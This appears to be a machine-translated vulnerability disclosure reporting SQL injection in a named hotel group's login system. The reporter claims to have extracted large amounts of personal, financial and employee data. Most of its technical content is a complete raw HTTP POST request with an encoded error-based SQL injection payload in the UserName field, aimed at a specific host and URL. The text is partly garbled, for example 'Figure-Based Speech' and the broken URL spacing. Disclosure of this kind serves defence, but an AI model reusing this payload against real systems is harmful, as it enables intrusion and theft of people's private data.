SQL Injection of an International Hotel Group system (leaked name/ID card/phone/address/internal financial information/position/text message/Contract/employee information/partner Information)
It took four days to prove its hazard .. Before running, I ran more than 20 thousand, and the count was several million. The database is too detailed.
Detailed description:
Vulnerability URL: http://halo.argylehotels.com/forp/Home/Login? ReturnUrl = % 2 fforp % 2f
POST /forp/home/login?ReturnUrl=/forp/ HTTP/1.1Content-Length: 211Content-Type: application/x-www-form-urlencodedCookie: lang=enHost: halo.argylehotels.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Password=g00dPa%24%24w0rD&UserName='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR (117)%2bCHAR(122)%2bCHAR(79)%2bCHAR(101)%2bCHAR(49)%2bCHAR(65)%2bCHAR(110)%2bCHAR(85)%2bCHAR (73))%20FROM%20syscolumns)%2b'
Proof of vulnerability:
Figure-Based Speech
Solution:
Filter.